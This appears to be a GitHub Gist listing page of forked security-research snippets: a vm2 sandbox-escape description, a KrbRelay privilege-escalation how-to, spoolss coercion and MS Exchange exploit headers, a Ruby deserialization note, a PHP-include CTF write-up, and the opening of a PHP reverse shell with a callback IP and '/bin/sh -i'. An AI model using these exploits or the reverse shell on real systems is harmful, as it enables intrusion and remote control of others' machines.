AST是Abstract Syntax Tree的缩写,可直译为抽象语法树。AST是对js代码逻辑的一种抽象分解,它把代码的计算逻辑细化,并按计算顺序以树的形式存储。利用AST,我们可以实现很多需求,例如语法高亮、语法检查、代码混淆等,babel就是以AST作为基础对js代码进行处理的。关于AST的操作总结下来无非3种:
- 把js代码解析为AST
- 按照需求修改AST
- 把AST格式化为js代码
好在js生态里已经有成熟的工具帮我们实现
FDlucifer
/ js_ast.md
Created
May 29, 2025 09:33
— forked from snailkn/js_ast.md
JS AST的简单应用:解析、修改、格式化
FDlucifer
/ vm2_3.9.16_sandbox_escape.md
Created
April 7, 2024 01:14
— forked from leesh3288/vm2_3.9.16_sandbox_escape.md
Sandbox Escape in vm2@3.9.16
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.
FDlucifer
/ krbrelay_privesc_howto.md
Created
May 31, 2023 04:59
— forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
FDlucifer
/ dementor.py
Created
May 30, 2023 05:15
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
FDlucifer
/ README.md
Created
May 20, 2023 18:42
— forked from staaldraad/README.md
Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/
Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:
--- !ruby/object:Gem::Requirement
requirements:
- - ">="
- !ruby/object:Gem::Version
version: '0'
FDlucifer
/ WorldWritableDirs.txt
Created
April 2, 2023 04:26
— forked from mattifestation/WorldWritableDirs.txt
World-writable directories in %windir%
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| c:\windows\system32\microsoft\crypto\rsa\machinekeys | |
| c:\windows\system32\tasks_migrated\microsoft\windows\pla\system | |
| c:\windows\syswow64\tasks\microsoft\windows\pla\system | |
| c:\windows\debug\wia | |
| c:\windows\system32\tasks | |
| c:\windows\syswow64\tasks | |
| c:\windows\tasks | |
| c:\windows\registration\crmlog | |
| c:\windows\system32\com\dmp | |
| c:\windows\system32\fxstmp |
FDlucifer
/ slideshare-dl.py
Created
February 20, 2023 10:02
— forked from julionc/slideshare-dl.py
slideshare-dl is a small command-line program for downloading slides from SlideShare.net
FDlucifer
/ Pwn2Own2021MSExchangeExploit.py
Created
February 17, 2023 07:43
— forked from rskvp93/Pwn2Own2021MSExchangeExploit.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import re | |
| import xml.dom.minidom | |
| import json | |
| import uuid | |
| import struct | |
| import string | |
| import random | |
| import hashlib | |
| import time |
FDlucifer
/ writeup.md
Created
January 22, 2023 08:41
— forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
FDlucifer
/ reverse-shell.php
Created
January 22, 2023 08:03
— forked from noobpk/reverse-shell.php
Php Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| set_time_limit (0); | |
| $VERSION = "1.0"; | |
| $ip = '10.10.14.12'; // CHANGE THIS | |
| $port = 1234; // CHANGE THIS | |
| $chunk_size = 1400; | |
| $write_a = null; | |
| $error_a = null; | |
| $shell = 'uname -a; w; id; /bin/sh -i'; |
NewerOlder